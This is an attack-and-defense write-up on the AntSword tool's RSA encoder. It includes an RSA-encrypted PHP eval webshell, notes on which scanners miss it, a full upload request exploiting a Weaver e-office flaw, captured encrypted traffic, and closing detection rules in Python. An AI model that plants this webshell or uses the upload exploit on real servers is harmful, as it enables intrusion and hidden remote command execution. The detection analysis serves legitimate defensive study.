AntSword (中国蚁剑) RSA Asymmetric Encryption: Attack and Defense

2022-06-30 16:14



0x00 Preface

This test is for learning purposes only. If it is used for illegal ends, neither the platform nor the author of this article is responsible; you bear the responsibility yourself!




0x01 AntSword

AntSword (中国蚁剑) is an open-source, cross-platform website management tool aimed mainly at legally authorized penetration testers and at website administrators performing routine operations. Its traffic is obfuscated with encoders and decoders, which can bypass detection systems such as WAFs and IDS, and it ships with a range of practical plugins. This makes it very convenient for security testers and popular with many people.

https://github.com/AntSwordProject/antSword



0x02 Generating the RSA webshell

Online RSA key generator

http://web.chacuo.net/netrsakeypair

Generate the public and private keys

Starting with AntSword v2.1.0, a PHP RSA encoder was added: the tool has a built-in RSA encoder module that uses RSA asymmetric encryption for transport. Create a new encoder -> RSA configuration -> click "generate key pair", then configure the public key, private key and PHP code to generate a webshell dedicated to AntSword connections.

Encoder settings

Checking whether the generated webshell evades detection

D盾 (D-Shield) scan: detected

冰河 webshell scanner: not detected

火绒 (Huorong) scan: not detected



0x03 Attack test

Uploading the webshell through a 泛微 (Weaver) e-office vulnerability

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 1289
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G
88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxv
JOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1e
W0EArkolkjFKe8Y4DQIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
eval($cmd);
--e64bdf16c554bbc109cecef6451c26a4--



Webshell connection address

Test method (encoder RSA + decoder default)

http://10.211.55.9:8082/images/logo/logo-eoffice.php


Connection test succeeded




Configure an HTTP proxy and capture the connection traffic for analysis

Proxy configuration (a Wireshark capture works just as well)




First interaction packet

Encoder RSA + decoder default




Encoder RSA + decoder base64



Encoder RSA + decoder rot13



URL-decoding and then base64-decoding the request data yields only unreadable bytes


Analysis of the encoder shows that the transmitted data is encrypted with the RSA public key and transported base64-encoded, which is how the traffic evades detection.


Connection traffic analysis

1. Base64:

POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Content-Length: 2810
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:37 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 118
Connection: close
Content-Type: text/html; charset=utf-8

721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472

2. chr

POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Content-Length: 2840
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:40 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 91
Connection: close
Content-Type: text/html; charset=utf-8

4629930P:/rbssvpr/jroebbg/vzntrf/ybtb     P:Q:     Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601     FLFGRZa9b886


3. default

POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 2828
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:34 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 92
Connection: close
Content-Type: text/html; charset=utf-8

a96ed3a93C:/eoffice/webroot/images/logo     C:D:     Windows NT YUNZUI-PC 6.1 build 7601     SYSTEM690a7








0x04 Detection recommendations

AntSword's design and usage incorporate a lot of thinking about attack-defense confrontation. Three detection recommendations follow:

First, detect the upload of the RSA webshell at the attack entry point, using static detection rules, a sandbox, or a webshell scanning engine (on traffic, behaviour, etc.).

Second, detect AntSword's strong features on the traffic side; these can be extracted by studying the analysis above.

Third, carry out all-round monitoring through threat hunting, and on finding an anomaly perform full-traffic retrospection to locate the attack.
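The first two recommendations, plus the "URL-decode then base64-decode gives unreadable bytes" observation from the traffic analysis above, can be turned into concrete checks. The following Python is an added example, not AntSword's code or anything from the original article: a static rule over PHP source that looks for the combination of markers the generated webshell always carries (PEM public key, openssl_public_decrypt, explode on "|", eval, $_POST), and a traffic rule over a form-encoded request body that URL-decodes the "ant" parameter, splits it on "|" and checks that every piece is clean base64 decoding to exactly one RSA block (128 bytes for the 1024-bit key in the captures). The parameter name "ant" is the one used by the page's webshell; the sample webshell source, the request bodies and the RSA block-size set are constructed for this example.

```python
"""Added example (not AntSword's own code): two detection checks derived
from the RSA webshell and the captured traffic shown above.

Static check: the generated webshell combines an embedded PEM public key,
openssl_public_decrypt(), explode() on "|" and eval(). Because the shell
calls openssl_public_decrypt(), the client must produce each chunk with the
matching private key, which is why nobody without it can decode the chunks.

Traffic check: the "ant" parameter carries "|"-separated, URL-encoded base64
chunks, each decoding to exactly one RSA block (128 bytes for the 1024-bit
key in the capture). Several same-sized, high-entropy blocks in one POST
parameter is the strong feature on the traffic side.

All sample inputs below are constructed for this example.
"""
import base64
import binascii
import random
import re
from typing import Optional
from urllib.parse import parse_qs, quote

# Every marker must be present for the static rule to fire.
STATIC_MARKERS = (
    re.compile(r"-----BEGIN PUBLIC KEY-----"),
    re.compile(r"openssl_public_decrypt\s*\(", re.I),
    re.compile(r"explode\s*\(\s*['\"]\|['\"]", re.I),
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"\$_(POST|REQUEST|GET)\s*\[", re.I),
)

# Ciphertext block length in bytes for RSA-1024 / 2048 / 4096 keys (assumed set).
RSA_BLOCK_SIZES = {128, 256, 512}


def match_rsa_webshell_source(src: str) -> bool:
    """Static rule: True when the PHP source carries all webshell markers."""
    return all(p.search(src) for p in STATIC_MARKERS)


def inspect_rsa_traffic(body: str, param: str = "ant") -> Optional[dict]:
    """Traffic rule over an application/x-www-form-urlencoded request body.

    Returns {"chunks": n, "block_size": bytes} when `param` looks like
    AntSword RSA-encoder output, otherwise None.
    """
    values = parse_qs(body).get(param)  # parse_qs also URL-decodes %2F %2B %7C ...
    if not values:
        return None
    chunks = values[0].split("|")
    sizes = []
    for chunk in chunks:
        try:
            sizes.append(len(base64.b64decode(chunk, validate=True)))
        except (binascii.Error, ValueError):
            return None  # not clean base64, so not this encoder
    # All chunks must be the same length and exactly one RSA block.
    if len(chunks) < 2 or len(set(sizes)) != 1 or sizes[0] not in RSA_BLOCK_SIZES:
        return None
    return {"chunks": len(chunks), "block_size": sizes[0]}


def constructed_request_body(n_chunks: int = 3, block: int = 128, seed: int = 7) -> str:
    """Build a body shaped like the capture: seeded random bytes stand in for
    RSA ciphertext (constructed data, reproducible for the test)."""
    rng = random.Random(seed)
    chunks = [
        base64.b64encode(bytes(rng.getrandbits(8) for _ in range(block))).decode()
        for _ in range(n_chunks)
    ]
    # quote(..., safe="") encodes "+", "/", "=" and "|" as %2B %2F %3D %7C,
    # matching the captured requests.
    return "ant=" + quote("|".join(chunks), safe="")


# Constructed PHP source with the shape of the page's webshell; the key body
# is a placeholder, not a real key.
SAMPLE_WEBSHELL_SRC = r"""<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
CONSTRUCTED-PLACEHOLDER-KEY-BODY
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) { $cmd .= $de; }
}
eval($cmd);
"""

SAMPLE_REQUEST_BODY = constructed_request_body()
BENIGN_REQUEST_BODY = "user=alice&note=hello%7Cworld"

if __name__ == "__main__":
    print("static rule on sample webshell:", match_rsa_webshell_source(SAMPLE_WEBSHELL_SRC))
    print("traffic rule on sample body   :", inspect_rsa_traffic(SAMPLE_REQUEST_BODY))
    print("traffic rule on benign body   :", inspect_rsa_traffic(BENIGN_REQUEST_BODY))
```

The traffic rule deliberately keys on structure (same-sized RSA blocks, one per "|"-separated piece) rather than on any byte of the ciphertext, since the ciphertext itself changes with every request; a WAF or NIDS rule built the same way is not defeated by the encryption. The static rule is strict on purpose (all five markers) to keep false positives low on legitimate PHP that merely uses OpenSSL; loosen it only with a sandbox or scanning engine behind it, as the first recommendation suggests.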



Technical support: White Hat Community (白帽子社区) team